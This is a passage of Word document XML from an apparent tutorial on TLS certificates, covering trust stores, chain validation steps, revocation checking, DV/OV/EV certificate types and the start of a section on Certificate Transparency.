        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The trust store:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207CDC42" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Every OS and browser ships with ~100–150 pre-installed root CA certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A9DD3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="884"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>These are the "trust anchors."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25259D4B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="884"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Any certificate signed (directly or indirectly) by one of these root CAs is trusted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10009E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="884"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>This is a curated list — CAs must pass rigorous audits to be included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F473FC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Certificate Chain Validation — Detailed Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24124212" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>When the client receives the server's certificate chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D76DE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474603AE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server Certificate (leaf): api.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64080CBD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> Signed by: Intermediate CA (Let's Encrypt R3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DDA965" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  │     </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> Signed by: Root CA (ISRG Root X1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B84F67" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  │     │     └── Self-signed (trust anchor — in client's trust store)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECACF5F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validation steps the client performs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45826F1D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain building:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Construct a path from the leaf certificate to a trusted root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED9243" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signature verification at each level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3010EF4E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verify leaf cert's signature using intermediate CA's public key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B94A72" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verify intermediate cert's signature using root CA's public key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2369B95A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Root CA is in the trust store → chain is trusted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F8858B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validity period check:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Is notBefore &lt;= now &lt;= notAfter? Certificate not expired?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E27E2CA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Name matching:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Does the certificate's Subject Alternative Name (SAN) match the hostname we're connecting to?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B342931" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Exact match: api.example.com matches api.example.com ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CED0E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Wildcard: *.example.com matches api.example.com ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF0B06" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Wildcard does NOT match: *.example.com does NOT match sub.api.example.com </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F16D652" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Revocation check:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Has this certificate been revoked?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A28EC44" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CRL (Certificate Revocation List): Download the CA's list of revoked certificates. Check if this cert's serial is on it. (Slow, large downloads.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFCDCCC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>OCSP (Online Certificate Status Protocol): Query the CA in real-time: "Is cert serial #12345 still valid?" (Faster, but adds latency.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AF4DC3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>OCSP Stapling: The server itself periodically fetches its own OCSP response from the CA and includes it in the TLS handshake. Client gets fresh revocation status without making its own OCSP query. (Best approach — no extra latency or privacy leak.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3146E88A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key usage checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Certificate is authorized for server authentication (key usage extensions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0853C08A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CT (Certificate Transparency) check:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Modern browsers verify the certificate was logged in a public CT log (prevents secret certificate issuance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100E2FC6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Certificate Types and Validation Levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B76E8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Validation (DV):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D49B1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proves: "You control this domain name."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A0F9F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verification: Automated (DNS record, HTTP file, email to admin@domain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A283CB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Cost: Free (Let's Encrypt) to $10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A707BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Time: Minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE0EDBF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Trust level: Lowest. Anyone controlling a domain can get one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0D9D8B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Visual: HTTPS padlock only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7161B037" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Organization Validation (OV):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB21C33" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="887"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proves: "You control this domain AND you're a verified organization."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0B1DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="887"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verification: CA checks business registration, phone call, legal documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE41CE3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="887"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Cost: $50–$200/year.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203513BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="887"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Time: Days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4353B7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="887"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Trust level: Medium.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF5857" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extended Validation (EV):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1CD8AC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proves: "You're a verified legal entity with rigorous identity checks."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B11ADF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Verification: Extensive legal documentation, physical address verification, phone verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360B56E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Cost: $200–$1000/year.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001CFD54" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Time: Weeks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F341D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Trust level: Highest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EF2A01" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Visual: Previously showed green bar + company name. Modern browsers no longer show this (EV is somewhat deprecated in terms of UI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B5F21" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Certificate Transparency (CT) — Preventing Rogue Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED24B8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA6755E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Any of the 100+ trusted CAs could issue a certificate for ANY domain. A compromised or malicious CA could issue a certificate for google.com to an attacker — and browsers would trust it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F17EC5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
